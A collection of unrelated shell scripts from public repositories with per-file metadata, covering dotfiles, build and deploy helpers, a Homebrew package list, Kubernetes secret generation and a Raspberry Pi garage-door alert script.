|
97a2f0e9ef7312610c37ffce82e14a99402a0806
|
Shell
|
ajallooe/.dotfiles
|
/bash_profile
|
UTF-8
| 2,697
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Editor
export EDITOR="vim"
# Upgraded ls
alias ls='ls -GFh'
alias rm='rm -i'
# Setting path
homebrew=/usr/local/bin:/usr/local/sbin
export PATH=$homebrew:$PATH
export ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future
export PATH="/Users/ajallooe/settings:$PATH"
#export PYTHONPATH=/usr/local/lib/python3.4/site-packages:/usr/local/lib/python2.7/site-packages:$PYTHONPATH
function is_in {
local list="$1"
local item="$2"
if [[ $list =~ (^|[[:space:]])"$item"($|[[:space:]]) ]] ; then
result=0
else
result=1
fi
return $result
}
export -f is_in
export LESSOPEN="| /usr/local/bin/src-hilite-lesspipe.sh %s" # for OSX
# export LESSOPEN="| /usr/bin/src-hilite-lesspipe.sh %s" # for Linux
export LESS=' -R '
# requires source-highlight
alias emacs="/usr/local/Cellar/emacs/24.4/Emacs.app/Contents/MacOS/Emacs -nw"
# Handy shortcuts
alias ll='ls -GFlh'
alias txe="open -a TextEdit"
alias txm="open -a TextMate"
alias zth="zathura"
# alias st="open /Applications/Sublime\ Text\ 2.app/Contents/SharedSupport/bin/subl"
alias ssoh="ssh ohaton"
function scoh { ssh ohaton "tar -cjf \"$1\"" | tar -xvjf; }
export -f scoh
alias ssif="ssh innisfree"
function scif { ssh innisfree "tar -cjf \"$1\"" | tar -xvjf; }
export -f scif
alias ssch="ssh innisfree -t \"ssh chinook\""
function scch { ssh innisfree -t "ssh chinook \"tar -cjf \"$1\" \"" | tar -xvjf; }
export -f scch
alias sscn="ssh chinook"
function scif { ssh innisfree "tar -cjf \"$1\"" | tar -xvjf; }
export -f scif
function ssth { ssh innisfree -t "ssh chinook -t \"ssh \"$1\"\""; }
export -f ssth
function scth { ssh innisfree -t "ssh chinook -t \"ssh \"$1\" \"tar -cjf \"$2\" \"\"" | tar -xvjf; }
export -f scth
function sstc { ssh chinook -t "ssh \"$1\""; }
export -f sstc
function sctc { ssh innisfree -t "ssh \"$1\" \"tar -cjf \"$2\" \"" | tar -xvjf; }
export -f sctc
alias ssgb="sstc gamebuilder"
function scgb { sctc gamebuilder "$1"; }
export -f scgb
alias ssfc="sstc fire-creek"
function scfc { sctc fire-creek "$1"; }
export -f scfc
alias ssfp="sstc fire-point"
function scfp { sctc fire-point "$1"; }
export -f scfp
function sccsn { scp "$1" innisfree:/cshome/ajallooe/copystore/; }
export -f sccsn
alias cdwk="cd /Users/ajallooe/work"
alias cdfg="cd /Users/ajallooe/work/Research/Go/Fuego/"
alias cdex="cd /Users/ajallooe/work/exp/fuego/experiments"
alias exfg="/Users/ajallooe/work/Research/Go/Fuego/fuegomain/fuego"
# Terminal colors
export PS1="\n BASH [\[\033[95m\]\D{%Y-%m-%d}\[\033[m\] \[\033[95m\]\t\[\033[m\]]\n\[\033[91m\]\u\[\033[m\]@\[\033[32m\]\h\[\033[m\]:\[\033[93m\]\w\[\033[m\]\n\$ "
export CLICOLOR=1
export LSCOLORS=ExFxCxDxBxegedabagacad
| true
|
834a691366d24aa29f7e5308ba7c22d0a36703d1
|
Shell
|
ellipsis-index/zeekay-dot-files
|
/ellipsis.sh
|
UTF-8
| 489
| 3.03125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
mod.install() {
ellipsis.link_files "$mod_path/common"
case "$(ellipsis.platform)" in
cygwin*)
ellipsis.link_files "$mod_path/platform/cygwin"
;;
darwin)
ellipsis.link_files "$mod_path/platform/osx"
;;
freebsd)
ellipsis.link_files "$mod_path/platform/freebsd"
;;
linux)
ellipsis.link_files "$mod_path/platform/linux"
;;
esac
}
| true
|
aa06a4a35b3b0def7cc0785da55d72d280386011
|
Shell
|
mtrebot/script
|
/go
|
UTF-8
| 232
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
cp * ./script
for D in *; do
if [ -d "${D}" ]; then
if [ "${D}" != "Servers" ]; then
cd "${D}"
echo "---===<<<*>>>===--- ${D} ----===<<<*>>>===---"
expect ../sync
cd ..
fi
fi
done
| true
|
7b05c4ef5ec722d2dfe630dada8278857b23d0df
|
Shell
|
stenstorp/aljos
|
/scripts/chroot-build.sh
|
UTF-8
| 3,812
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
source variables/variables.common
COMPONENT=$1
unset name version source _prepare _configure _make _install
source ${COMPONENTS_DIR}/${COMPONENT}/info
source ${COMPONENTS_DIR}/${COMPONENT}/build
filename="${source##*/}"
if [ -z "${folder}" ]; then
folder=${name}-${version}
fi
if [ ! -e ${COMPONENTS_DIR}/${COMPONENT} ]; then
echo "Component \"${COMPONENT}\" not found"
exit 1
fi
if [ -e ${LJOS}/build ]; then
sudo rm -rf ${LJOS}/build
fi
mkdir ${LJOS}/build
if [ ! -e "${SOURCE_DIR}/${filename}" ]; then
wget -P ${SOURCE_DIR} ${source}
fi
echo "$1: extracting..."
tar -C ${LJOS}/build -xf ${SOURCE_DIR}/${filename}
echo "export THREADS=${THREADS}" >> ${LJOS}/build/component-build_info
echo "export LJOS_HOST=${LJOS_HOST}" >> ${LJOS}/build/component-build_info
echo "export LJOS_TARGET=${LJOS_TARGET}" >> ${LJOS}/build/component-build_info
echo "export LJOS_CPU=${LJOS_CPU}" >> ${LJOS}/build/component-build_info
echo "export LJOS_ARCH=${LJOS_ARCH}" >> ${LJOS}/build/component-build_info
echo "export LJOS_ENDIAN=${LJOS_ENDIAN}" >> ${LJOS}/build/component-build_info
echo "export LJOS_BITS=${LJOS_BITS}" >> ${LJOS}/build/component-build_info
cat ${COMPONENTS_DIR}/${COMPONENT}/info >> ${LJOS}/build/component-build_info
mv ${LJOS}/build/${folder}/* ${LJOS}/build/
#mv ${LJOS}/build/${folder}/.* ${LJOS}/build/
rmdir ${LJOS}/build/${folder}
if [ "${LJOS_ARCH}" == "x86" ]; then
COMPILE_ARCH=i686
else
COMPILE_ARCH=${LJOS_ARCH}
fi
if [ "$(uname -m)" != "${COMPILE_ARCH}" ]; then
if [ -e "$(which ${LJOS_QEMU})" ]; then
cp `which ${LJOS_QEMU}` ${LJOS}/usr/bin/
else
echo "\"${LJOS_QEMU}\" not in path"
exit 1
fi
else
LJOS_QEMU=""
fi
if [ "${LJOS_ARCH}" == "x86" ] && [ "$(uname -m)" == "x86_64" ]; then
BITS="linux32"
else
BITS=""
fi
if [ ! -e "${LOG_DIR}/${COMPONENT}" ]; then
mkdir -p ${LOG_DIR}/${COMPONENT}
fi
if [ ! -z $(type -t _prepare) ]; then
type _prepare | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_prepare
echo "$1: preparing..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_prepare' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-prepare.log || exit 1
fi
if [ ! -z $(type -t _configure) ]; then
type _configure | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_configure
echo "$1: configuring..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_configure' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-configure.log || exit 1
fi
if [ ! -z $(type -t _make) ]; then
type _make | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_make
echo "$1: building..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_make' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-make.log || exit 1
fi
if [ ! -z $(type -t _install) ]; then
type _install | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_install
echo "$1: installing..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_install' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-install.log || exit 1
fi
if [ ! -z $(type -t _post) ]; then
type _post | head --lines=-1 | tail --lines=+4 > ${LJOS}/build/component-build_post
echo "$1: post tasks..."
sudo ${BITS} chroot ${LJOS} ${LJOS_QEMU} /bin/bash -c 'cd /build; source /build/component-build_info; source /build/component-build_post' &> ${LOG_DIR}/${COMPONENT}/${COMPONENT}-post.log || exit 1
fi
sudo rm -rf ${LJOS}/build
if [ -e ${LJOS}/usr/bin/${LJOS_QEMU} ]; then
sudo rm ${LJOS}/usr/bin/${LJOS_QEMU}
fi
| true
|
d66816cb287efd5ec95f8eed5c97d3b7fc07e819
|
Shell
|
dumbo25/garage-door
|
/usr/local/bin/garage.sh
|
UTF-8
| 1,673
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/bash
# check if the garage door is open.
# enter a crontab: */5 * * * * sudo /usr/local/bin/garage.sh
# If open send an alert and write to syslog
up=0
mobile='your-number@txt.att.net'
sensor=5
gpio -g mode $sensor down
sleep 1
# get current time
currTime=`date +%k%M`
# get whether or not on vacation
# I get emails when SQLITE_BUSY occurs. So, changed timeout from 1000 to 20000. Seems like recommended solution.
vacation=$(sqlite3 -init <(echo .timeout 20000) /var/www/db/garagedoor.db "SELECT value FROM status WHERE name = \"vacation\"";)
# # if on vacation
if [ "$vacation" == "yes" ]
then
# and door is up
if [ "$door" -eq "$up" ]; then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open and on vacation" $mobile
fi
# if not on vacation and time is between 10pm and midnight
elif [ "$vacation" == "no" ]
then
if [ $currTime -gt 2200 -a $currTime -lt 2400 ]
then
if [ "$door" -eq "$up" ]
then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open late at night" $mobile
fi
# or, if time is less then 7:00am
elif [ $currTime -gt 0 -a $currTime -lt 700 ]
then
if [ "$door" -eq "$up" ]
then
logger rpiGarageOpener: Garage Door Open
echo "close the garage door" | mail -s "Garage Door Open to early" $mobile
fi
fi
fi
# some debug outputs
# echo "up = $up"
# echo "door = $door"
# echo "vacation = #vacation"
# echo "time = $currtIme"
exit 0
| true
|
5972946224d522080a28b171e28daf441b1743b6
|
Shell
|
jeroldleslie/deployments
|
/ansible/roles/odyssey_event_gen_code/templates/odyssey-event-gen.j2
|
UTF-8
| 3,280
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
ODYSSEY_EVENT_GEN_BIN={{odyssey_home}}/odyssey-event-gen/bin
DESC="Odyssey Event Gen"
NAME=Odyssey_Event_Gen
DAEMON="mvn -Dmaven.tomcat.port=8181 tomcat:run"
DAEMON_ARGS=" -f {{odyssey_home}}/odyssey-event-gen/pom.xml"
PIDFILE=$ODYSSEY_EVENT_GEN_BIN/$NAME.pid
SCRIPTNAME=$NAME
LOG=$ODYSSEY_EVENT_GEN_BIN/$NAME.log
pid_file_exists() {
[ -f "$PIDFILE" ]
}
do_start() {
if pid_file_exists
then
echo "Odyssey Event Gen is already running. So Killing..."
KILL=$(kill -15 $PID)
rm $PIDFILE
sleep 1
echo -e "\Odyssey Event Gen (PID:$PID) killed"
$DAEMON $DAEMON_ARGS 1>"$LOG" 2>&1 &
echo $! > "$PIDFILE"
PID=$!
if [ "$PID" > 0 ]
then
echo "Odyssey Event Gen started with pid $!"
else
echo "Odyssey Event Gen could not be started"
fi
else
$DAEMON $DAEMON_ARGS 1>"$LOG" 2>&1 &
echo $! > "$PIDFILE"
PID=$!
if [ "$PID" > 0 ]
then
echo "Odyssey Event Gen started with pid $!"
else
echo "Odyssey Event Gen could not be started"
fi
fi
}
do_status() {
if pid_file_exists
then
PID=$(cat $PIDFILE)
STATUS=$(ps ax | grep $PID | grep -v grep | awk '{print $1}')
if [ "$STATUS" == "$PID" ]
then
echo "Odyssey Event Gen is running on proccess $PID"
else
echo "Odyssey Event Gen is NOT running"
rm $PIDFILE
fi
else
echo "Odyssey Event Gen is NOT running"
fi
}
do_stop() {
if pid_file_exists
then
PID=$(cat $PIDFILE)
STATUS=$(ps ax | grep $PID | grep -v grep | awk '{print $1}')
if [ "$STATUS" == "$PID" ]
then
echo "Killing Odyssey Event Gen...."
KILL=$(kill -15 $PID)
rm $PIDFILE
sleep 1
echo -e "\Odyssey Event Gen (PID:$PID) killed"
else
echo "Odyssey Event Gen is NOT running"
rm $PIDFILE
fi
else
echo "Odyssey Event Gen is NOT running"
fi
}
case "$1" in
start)
do_start;;
stop)
do_stop
;;
status)
do_status
;;
restart)
do_stop
do_start
;;
*)
echo "Usage: $SCRIPTNAME {start|stop|status|restart}" >&2
exit 3
;;
esac
exit 0
| true
|
cc74b5d50f04ca0453de45aab3c1617c6a455d99
|
Shell
|
Chacon11/bddExample
|
/travis-kafka.sh
|
UTF-8
| 414
| 2.515625
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
set -eu
MIRROR=http://apache.rediris.es/kafka/1.0.0/kafka_2.11-1.0.0.tgz
test -f kafka.tgz || wget $MIRROR -O kafka.tgz
mkdir -p kafka && tar xzf kafka.tgz -C kafka --strip-components 1
kafka/bin/zookeeper-server-start.sh -daemon kafka/config/zookeeper.properties
echo "delete.topic.enable=true" >> kafka/config/server.properties
kafka/bin/kafka-server-start.sh -daemon kafka/config/server.properties
| true
|
aac4a062a1cd666143b26cf4948a382243170fe8
|
Shell
|
jzbor/dotfiles
|
/.scripts/dwm/dwmvolume.sh
|
UTF-8
| 1,277
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/sh
# Dependencies: volume.sh pacmd pactl sh xmenu
select_volume () {
menu=" 100% volume.sh --set 100
90% pademelon-tools volume --set 90
80% pademelon-tools volume --set 80
70% pademelon-tools volume --set 70
60% pademelon-tools volume --set 60
50% pademelon-tools volume --set 50
40% pademelon-tools volume --set 40
30% pademelon-tools volume --set 30
20% pademelon-tools volume --set 20
10% pademelon-tools volume --set 10"
echo "$menu" | xmenu | sh
}
gen_output_menu () {
pactl list short sinks | cut -f1,2 | sed 's/\(.*\)\t.*\.\(.*\)/\t\1 \2\tpacmd set-default-sink \1/'
}
gen_input_menu () {
pactl list short sources | cut -f1,2 | sed 's/\(.*\)\t.*\.\(.*\)/\t\1 \2\tpacmd set-default-source \1/'
}
audio_menu () {
menu="ﱝ Mute pademelon-tools volume --mute toggle
Mute Microphone pademelon-tools volume --mute-input toggle
蓼 Select Output
$(gen_output_menu)
Select Input
$(gen_input_menu)
ﲿ Audio Setup pavucontrol
漣 Pulse Settings paprefs"
echo "$menu" | xmenu | sh
}
case $1 in
1) select_volume ;;
2) pademelon-tools volume --mute toggle ;;
3) audio_menu ;;
4) pademelon-tools volume --inc 5 ;;
5) pademelon-tools volume --dec 5;;
esac
| true
|
b3aa36b3afffce772f7a5c9574bff92a9335f500
|
Shell
|
nanchengking/fische
|
/deploy.sh
|
UTF-8
| 315
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
cd ..
pwd
#压缩
project=fische
echo '删除原有压缩包……'
rm ./${project}.tar.gz
echo '开始压缩新包'
tar zcvf ${project}.tar.gz ./${project}
echo '压缩结束,开始上传新压缩包'
ali_scp push ${project}.tar.gz
#解压:tar zxvf pageCenter.tar.gz
echo '上传成功'
| true
|
bcafcf95935a9e2c455a1cea786c429896e61e9a
|
Shell
|
pedrohsdias/php-laravel
|
/docker-entrypoint.sh
|
UTF-8
| 775
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
DIR="/var/www/html/$NOME_PROJETO/"
if [ "$(ls -A $DIR)" ]; then
if [! "$(ls -A $DIR/vendor/)" ]; then
printf "\t#########################\n\t### Vendor não existe ###\n\t#########################\n\n Para baixar dependencias execute: docker run --rm -it -v $NOME_PROJETO:/app composer install --ignore-platform-reqs --no-scripts\n"
else
printf "\t#########################\n\t### Nada a fazer! ###\n\t#########################\n"
fi
else
printf "\t#########################\n\t### Criando projeto ###\n\t#########################\n"
unzip -q /var/www/$NOME_PROJETO.zip -d /var/www/html/
chmod -R 777 /var/www/html/$NOME_PROJETO/
php /var/www/html/$NOME_PROJETO/artisan key:generate
fi
apache2-foreground
| true
|
b89f88cd84e504e13d2d2b60f95133d716b84c7c
|
Shell
|
rache1shin/ssurnd
|
/DB/FASTQ_EXPORT/myfastqexport.sh
|
UTF-8
| 536
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
F_OR_P=$(php FASTQ_EXPORT_REFER.php $1 $2)
FASTQ_COL=$1_${2%.*}_F
if [ -z $F_OR_P ]
then
php FULL_FASTQ_EXPORT.php $FASTQ_COL > BEFORE_SORT_FASTQ.txt
cat BEFORE_SORT_FASTQ.txt | sort -k1,1 -n | cut -f 2- | tr "\t" "\n" > $2
else
php FASTQ_ID_EXPORT.php $FASTQ_COL > BEFORE_SORT_ID.txt
php SAM_SEQ_QUAL_EXPORT.php $F_OR_P > BEFORE_SORT_SEQ_QUAL.txt
cat BEFORE_SORT_ID.txt | sort -k1,1 -n | cut -f 2- > AFTER_SORT_ID.txt
cat BEFORE_SORT_SEQ_QUAL.txt | sort -k1,1 -n | cut -f 2- > AFTER_SORT_SEQ_QUAL.txt
./FASTQ_EXPORT $2
fi
| true
|
e755fa4c3fccb7e74af12704d51c4358764ae3b8
|
Shell
|
Cris140/vc_tacotron
|
/download_data.sh
|
UTF-8
| 1,364
| 2.9375
| 3
|
[
"MIT",
"CC-BY-3.0",
"CC-BY-4.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
#download dataset
wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_bdl_arctic-0.95-release.zip -P /tmp
wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_clb_arctic-0.95-release.zip -P /tmp
# wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_rms_arctic-0.95-release.zip -P /tmp
# wget http://festvox.org/cmu_arctic/cmu_arctic/packed/cmu_us_slt_arctic-0.95-release.zip -P /tmp
#unzip
unzip -q /tmp/cmu_us_bdl_arctic-0.95-release.zip -d /tmp/bdl
unzip -q /tmp/cmu_us_clb_arctic-0.95-release.zip -d /tmp/clb
# unzip -q /tmp/cmu_us_rms_arctic-0.95-release.zip -d /tmp/rms
# unzip -q /tmp/cmu_us_slt_arctic-0.95-release.zip -d /tmp/slt
repo=$PWD
# process bdl
cd /tmp/bdl/cmu_us_bdl_arctic/wav
for f in `ls`;
do
new_name="bdl_$f"
mv $f $new_name
done
# process clb
cd /tmp/clb/cmu_us_clb_arctic/wav
for f in `ls`;
do
new_name="clb_$f"
mv $f $new_name
done
# return repo dir
cd $repo
cp "/tmp/clb/cmu_us_clb_arctic/wav/"* "parallel_data/wavs/"
cp "/tmp/bdl/cmu_us_bdl_arctic/wav/"* "parallel_data/wavs/"
ls "parallel_data/wavs"|grep "clb"|tail -n +101|sort > /tmp/source.txt
ls "parallel_data/wavs"|grep "bdl"|tail -n +101|sort > /tmp/target.txt
ls "parallel_data/wavs"|grep "clb"|head -n 100|sort > "parallel_data/test.lst"
paste -d\| /tmp/source.txt /tmp/target.txt > "parallel_data/metadata.csv"
| true
|
f4f053e8d8ad83d6f40e640222071d8417129b30
|
Shell
|
trauts/psycho
|
/doc/example5/0.read_me
|
UTF-8
| 364
| 2.65625
| 3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#! /bin/sh
export MATS=8
export ITEMS=1
export SETS=16
# run each file in numerical order - ie
# 1.check_me
# check the materials
# 2.latin_me
# latin square them
# 3.random_me
# randomise the latin squares
# 4.output_me
# you now have an output directory containing booklets (well, almost)
#
# 5.tidy_me
# delete everything except the materials, of course
| true
|
8280add7e96e2cd1dda2edba5c12a0f31f5aca5a
|
Shell
|
bhartiroshan/om
|
/scripts/downloads.sh
|
UTF-8
| 130
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
download_mms(){
local DOWNLOADURL=$1
local MMSFOLDER=$2
curl --output $MMSFOLDER.tar.gz $DOWNLOAD_URL
}
| true
|
68ec8e65ccbbd6ece5cb7e9b73eac1ba6f18b018
|
Shell
|
timoguin/shell-functions
|
/source-all.sh
|
UTF-8
| 406
| 3.578125
| 4
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# =============================================================================
# Sources all functions
# =============================================================================
echo "Sourcing all functions"
for func in **/*.sh; do
. "$func" || err=true
if [ "$err" == "true" ]; then
echo "Sourcing failed: $script" 1>&2
continue
fi
echo "Sourced function: $func"
done
| true
|
8e6bc90ca7f09d08779df049dafd88e7454dccd1
|
Shell
|
guillaumerosinosky/harness
|
/it/header.sh
|
UTF-8
| 450
| 2.765625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Reset
NC='\033[0m' # Text Reset
# Regular Colors
RED='\033[0;31m' # Red
GREEN='\033[0;32m' # Green
YELLOW='\033[0;33m' # Yellow
BLUE='\033[0;34m' # Blue
PURPLE='\033[0;35m' # Purple
CYAN='\033[0;36m' # Cyan
WHITE='\033[0;37m' # White
LINE="=================================================================="
GLINE="${GREEN}${LINE}${NC}"
RLINE="${RED}${LINE}${NC}"
| true
|
9fce944749b9d1d1dbc64f579d5d988fff01bab9
|
Shell
|
TheUCoin/theucoin
|
/contrib/init/theucoind.init
|
UTF-8
| 1,309
| 3.65625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# theucoind The TheUCoin core server.
#
#
# chkconfig: 345 80 20
# description: theucoind
# processname: theucoind
#
# Source function library.
. /etc/init.d/functions
# you can override defaults in /etc/sysconfig/theucoind, see below
if [ -f /etc/sysconfig/theucoind ]; then
. /etc/sysconfig/theucoind
fi
RETVAL=0
prog=theucoind
# you can override the lockfile via TUCOIND_LOCKFILE in /etc/sysconfig/theucoind
lockfile=${TUCOIND_LOCKFILE-/var/lock/subsys/theucoind}
# theucoind defaults to /usr/bin/theucoind, override with TUCOIND_BIN
tucoind=${TUCOIND_BIN-/usr/bin/theucoind}
# theucoind opts default to -disablewallet, override with TUCOIND_OPTS
tucoind_opts=${TUCOIND_OPTS}
start() {
echo -n $"Starting $prog: "
daemon $DAEMONOPTS $tucoind $tucoind_opts
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && touch $lockfile
return $RETVAL
}
stop() {
echo -n $"Stopping $prog: "
killproc $prog
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && rm -f $lockfile
return $RETVAL
}
case "$1" in
start)
start
;;
stop)
stop
;;
status)
status $prog
;;
restart)
stop
start
;;
*)
echo "Usage: service $prog {start|stop|status|restart}"
exit 1
;;
esac
| true
|
fb7ff7e7f683d988ad209d37cc0eea569afa9fc2
|
Shell
|
oneKelvinSmith/homesick-dotfiles
|
/home/.brew
|
UTF-8
| 932
| 2.671875
| 3
|
[] |
no_license
|
#! /bin/sh -x
# Check for Homebrew,
# Install if we don't have it
if test ! $(which brew); then
echo "Installing homebrew..."
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
# Update homebrew recipes
brew update
# Tap casks for betas, etc
brew tap caskroom/cask
brew tap caskroom/versions
brew tap homebrew/science
binaries=(
axel
bash
brew-cask
coreutils
leiningen
elixir
erlang
findutils
fish
gcc
git
gnutls
hub
htop
imagemagick
node
parallel
phantomjs
postgresql
python
python3
r
rbenv
readline
reattach-to-user-namespace
redis
ruby-build
sbt
scala
sqlite
the_silver_searcher
tig
tmux
tree
vim
watch
wemux
wget
zsh
)
echo "installing binaries…"
brew install ${binaries[@]}
# Install emacs with its peculiarities
brew install emacs --HEAD --use-git-head --cocoa --with-gnutls --with-imagemagick
| true
|
ad40ea1200aa3f29083c120677b21ce2c7a298d2
|
Shell
|
gtcno/opendistro-elasticsearch
|
/scripts/generate_kubernetes_secrets.sh
|
UTF-8
| 1,190
| 2.984375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
SCRIPTPATH=$(dirname $(realpath -s $0))
cd $SCRIPTPATH/..
NAMESPACE=$1
RELEASE_NAME=$2
PASSWORD=$3
HASH=$(docker run amazon/opendistro-for-elasticsearch sh /usr/share/elasticsearch/plugins/opendistro_security/tools/hash.sh -p $PASSWORD)
echo "generate kubernetes secret for $RELEASE_NAME certificates"
helm template $RELEASE_NAME --set odfe.generate_secrets=true --show-only templates/odfe-cert-secrets.yaml . | kubectl apply -n $NAMESPACE -f -
echo "encrypting password"
echo "generate kubernetes secret for certificates"
helm template $RELEASE_NAME --set odfe.generate_secrets=true --set odfe.security.password.hash="$HASH" --show-only templates/odfe-config-secrets.yaml . | kubectl apply -n $NAMESPACE -f -
echo "generating secret for kibana"
helm template $RELEASE_NAME --set odfe.generate_secrets=true --set kibana.password="$PASSWORD" --show-only templates/odfe-kibana-secrets.yaml . | kubectl apply -n $NAMESPACE -f -
echo "generating secret for exporter"
helm template $RELEASE_NAME --set odfe.generate_secrets=true --set exporter.password="$PASSWORD" --show-only templates/odfe-prometheus-exporter-secrets.yaml . | kubectl apply -n $NAMESPACE -f -
| true
|
b43ada34ff77bc70a7763256d389c2cc27c11f8e
|
Shell
|
alisw/alidist
|
/openloops.sh
|
UTF-8
| 1,339
| 3.125
| 3
|
[] |
no_license
|
package: Openloops
version: "%(tag_basename)s"
tag: "OpenLoops-2.1.2"
source: https://gitlab.com/openloops/OpenLoops.git
requires:
- "GCC-Toolchain:(?!osx)"
- "Python:(?!osx)"
- "Python-modules:(?!osx)"
- "Python-system:(osx.*)"
build_requires:
- alibuild-recipe-tools
---
#!/bin/bash -e
rsync -a --delete --exclude '**/.git' --delete-excluded "$SOURCEDIR/" .
unset HTTP_PROXY # unset this to build on slc6 system
# Due to typical long install dir paths used by aliBuild, the string lengths must be increased
sed -i -e 's/max_string_length\ =\ 255/max_string_length\ =\ 1000/g' pyol/config/default.cfg
./scons
JOBS=$((${JOBS:-1}*1/5))
[[ $JOBS -gt 0 ]] || JOBS=1
for proc in ppjj ppjj_ew ppjjj ppjjj_ew ppjjj_nf5 ppjjjj; do
./scons --jobs="$JOBS" "auto=$proc"
done
for inst in examples include lib openloops proclib pyol; do
cp -r "$inst" "$INSTALLROOT/"
done
#ModuleFile
mkdir -p etc/modulefiles
alibuild-generate-module --bin --lib > "etc/modulefiles/$PKGNAME"
cat >> "etc/modulefiles/$PKGNAME" <<EoF
# Our environment
set OPENLOOPS_ROOT \$::env(BASEDIR)/$PKGNAME/\$version
setenv OPENLOOPS_ROOT \$OPENLOOPS_ROOT
setenv OpenLoopsPath \$OPENLOOPS_ROOT
prepend-path LD_LIBRARY_PATH \$OPENLOOPS_ROOT/proclib
EoF
mkdir -p "$INSTALLROOT/etc/modulefiles"
rsync -a --delete etc/modulefiles/ "$INSTALLROOT/etc/modulefiles"
| true
|
c84edbbbf9eee0cd2407ba9e04c556540df0b96d
|
Shell
|
unoexperto/nginx-docker-images
|
/transmission-seedbox/docker/scripts/static-configuration.sh
|
UTF-8
| 796
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Apache
###############################################################################
# Set configuration
rm -f /etc/apache2/sites-enabled/*
cp /docker/configurations/web.conf /etc/apache2/sites-available
ln -s /etc/apache2/sites-available/web.conf /etc/apache2/sites-enabled/web.conf
# Activate htaccess modules
a2enmod authz_groupfile
# SFTP
###############################################################################
# Add configuration for SFTP
cp /docker/configurations/sshd_config /etc/ssh/sshd_config
# Add SFTP group
addgroup sftp
# Transmission
###############################################################################
# Create directories
mkdir -p /data/configuration/torrents
mkdir -p /data/downloads
# Create file log
touch /var/log/transmission.log
| true
|
53e541c621e8f9383b88dd43b44961e8916a14ea
|
Shell
|
sijiaoh/dotfiles
|
/lib/brew_path.sh
|
UTF-8
| 312
| 3.078125
| 3
|
[] |
no_license
|
. ${DOTFILES_ROOT}/lib/os.sh
if test ${OS} = 'linux'; then
export PATH="/home/linuxbrew/.linuxbrew/bin:${PATH}"
export MANPATH="/home/linuxbrew/.linuxbrew/share/man:${MANPATH:-""}"
export INFOPATH="/home/linuxbrew/.linuxbrew/share/info:${INFOPATH:-""}"
else
eval "$(/opt/homebrew/bin/brew shellenv)"
fi
| true
|
281a27086b4d60eddb231e9fa25da2a7306a0580
|
Shell
|
zdrazil/my-preferences
|
/.zshrc
|
UTF-8
| 3,736
| 2.828125
| 3
|
[] |
no_license
|
# allow shortcut ctrl-W to delete parts of path only
# e.g. a/b/c + ctrl-W -> results in a/b
autoload -U select-word-style
select-word-style bash
autoload -Uz compinit
compinit
if [ -f "$HOME/.config/bash-like/commonrc" ]; then
. "$HOME/.config/bash-like/commonrc"
fi
if [ -f "$MY_CONFIG_HOME/bash-like/append_paths" ]; then
. "$MY_CONFIG_HOME/bash-like/append_paths"
fi
HOMEBREW_PREFIX=$(brew --prefix)
if type brew &>/dev/null; then
FPATH="$HOMEBREW_PREFIX"/share/zsh-completions:$FPATH
fi
if [ -f "$HOMEBREW_PREFIX/opt/asdf/libexec/asdf.sh" ]; then
. "$HOMEBREW_PREFIX/opt/asdf/libexec/asdf.sh"
fi
if [ -f "/opt/local/share/asdf/asdf.sh" ]; then
. /opt/local/share/asdf/asdf.sh
fi
# . $HOME/.asdf/asdf.sh
fpath=(${ASDF_DIR}/completions $fpath)
# ---------------------------------------------------
# used %{...%} to prevent jumping text when writing
# export PROMPT="·%n@%m %{$fg[reset_color]%}%1~%{$reset_color%}> "
# http://zsh.sourceforge.net/Doc/Release/Prompt-Expansion.html
export PROMPT="·%(1j.[%j].)%(0?..%?) %1~ > "
# Git in prompt
autoload -Uz vcs_info
zstyle ':vcs_info*' formats "%b"
setopt prompt_subst
precmd() { vcs_info }
export RPROMPT='${vcs_info_msg_0_}'
setopt AUTO_MENU # Show completion menu on a successive tab press.
